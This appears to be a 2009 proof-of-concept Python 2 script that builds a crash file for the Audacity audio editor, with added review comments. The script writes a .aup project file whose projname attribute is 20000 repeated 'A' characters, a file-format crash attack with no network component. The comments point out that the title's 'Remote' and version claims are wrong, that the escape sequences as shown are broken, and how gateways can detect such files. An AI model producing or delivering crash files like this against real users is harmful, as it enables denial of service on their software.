
# Title : Audacity 1.6.2 (.aup File) Remote off by one Crash Exploit
# Published : 2009-01-07
# Author : Stack


#usage: exploit.py
#
# Proof-of-concept generator (Python 2: print statements, raw_input). It takes
# no arguments and no network input. It concatenates header + buff + header2
# and writes the result to "crash.aup" in the current working directory.
#
# NOTE(review): the title calls this "Remote", but nothing here opens a socket.
# The script only produces a local file, so delivery depends on a user opening
# that file in Audacity. Triage it as a user-assisted file-format issue.
#
# NOTE(review): the title says Audacity 1.6.2, while the project header below
# declares audacityversion="1.2.6" once decoded. This is probably a digit
# transposition in the title; confirm the affected version against the vendor
# advisory, which this page does not give.
#
# NOTE(review): as rendered on this page the backslashes of the escape
# sequences appear to be lost. The banner strings end in a stray "n" where
# "\n" was evidently meant, and the "xNN" runs below are plain ASCII text
# rather than the bytes they were written to encode. The comments on each
# literal describe the intended decoded content, not what this listing would
# emit verbatim.
print "**************************************************************************"
print " Audacity 1.6.2  (.aup file ) Remote off by one Crash Exploitn"
print " Author: Mountassif Moad "
print " the best: Evil finger & v4 Team "
print " Tested on: Windows XP Pro SP2 Frn"
print " Greetings to: All friends"
print " almawto li israeln"
print "**************************************************************************"
         
  
# Opening of the project file. Decoded, the hex pairs spell an XML declaration
# (<?xml version="1.0"?>), a CR LF, and the start of an <audacityproject>
# element, ending at the opening quote of its projname attribute.
header = (
         "x3cx3fx78x6dx6cx20x76x65x72"
         "x73x69x6fx6ex3dx22x31x2ex30x22x3f"
         "x3ex0dx0ax3cx61x75x64x61x63x69x74"
         "x79x70x72x6fx6ax65x63x74x20x70x72"
          "x6fx6ax6ex61x6dx65x3dx22"
          )
 
# Remainder of the document. Decoded, it closes the projname quote, carries the
# other <audacityproject> attributes (version, audacityversion, sel0, sel1,
# vpos, h, zoom, rate), then an empty <tags .../> element and the closing
# </audacityproject> tag. No long values appear here; it reads as ordinary
# project metadata.
header2 = (
        "x22x20x76x65x72x73x69x6fx6ex3dx22"
        "x31x2ex31x2ex30x22x20x61x75x64x61"
        "x63x69x74x79x76x65x72x73x69x6fx6e"
        "x3dx22x31x2ex32x2ex36x22x20x73x65"
        "x6cx30x3dx22x30x2ex30x30x30x30x30"
        "x30x30x30x30x30x22x20x73x65x6cx31"
        "x3dx22x30x2ex30x30x30x30x30x30x30"
        "x30x30x30x22x20x76x70x6fx73x3dx22"
        "x30x22x20x68x3dx22x30x2ex30x30x30"
        "x30x30x30x30x30x30x30x22x20x7ax6f"
        "x6fx6dx3dx22x38x36x2ex31x33x32x38"
        "x31x32x35x30x30x30x22x20x72x61x74"
        "x65x3dx22x34x34x31x30x30x2ex30x30"
        "x30x30x30x30x22x20x3ex0dx0ax09x3c"
        "x74x61x67x73x20x74x69x74x6cx65x3d"
        "x22x22x20x61x72x74x69x73x74x3dx22"
        "x22x20x61x6cx62x75x6dx3dx22x22x20"
        "x74x72x61x63x6bx3dx22x2dx31x22x20"
        "x79x65x61x72x3dx22x22x20x67x65x6e"
        "x72x65x3dx22x2dx31x22x20x63x6fx6d"
        "x6dx65x6ex74x73x3dx22x22x20x69x64"
        "x33x76x32x3dx22x31x22x20x2fx3ex0d"
        "x0ax3cx2fx61x75x64x61x63x69x74x79"
        "x70x72x6fx6ax65x63x74x3e"
  )
  
# Filler that becomes the projname attribute value: one unit repeated 20000
# times (intended as the single byte 0x41, "A"). The script gives no offset,
# return address or payload, so all it demonstrates is a crash on an over-long
# attribute. The "off by one" root cause named in the title is not shown on
# this page.
#
# Defender's view: a .aup file is XML, so a projname value of this size is easy
# to flag. An attribute-length check in a mail or web gateway or a file scanner
# will catch it, as will a repeated-byte run in the first lines of the file.
# Treat project files from untrusted sources as untrusted input, and run a
# maintained Audacity release.
buff = "x41" * 20000
exploit = header + buff + header2
try:
    # Text-mode write of the assembled document; the name is fixed, so an
    # existing crash.aup in the working directory is overwritten.
    out_file = open("crash.aup",'w')
    out_file.write(exploit)
    out_file.close()
    # raw_input is used only as a pause so the console window stays open.
    raw_input("nExploit file created!n")
except:
    # NOTE(review): the bare except hides the cause of any failure. A
    # permission error, a full disk and Ctrl-C at the prompt all print the
    # same "Error", and the file handle is not closed on the failure path.
    print "Error"
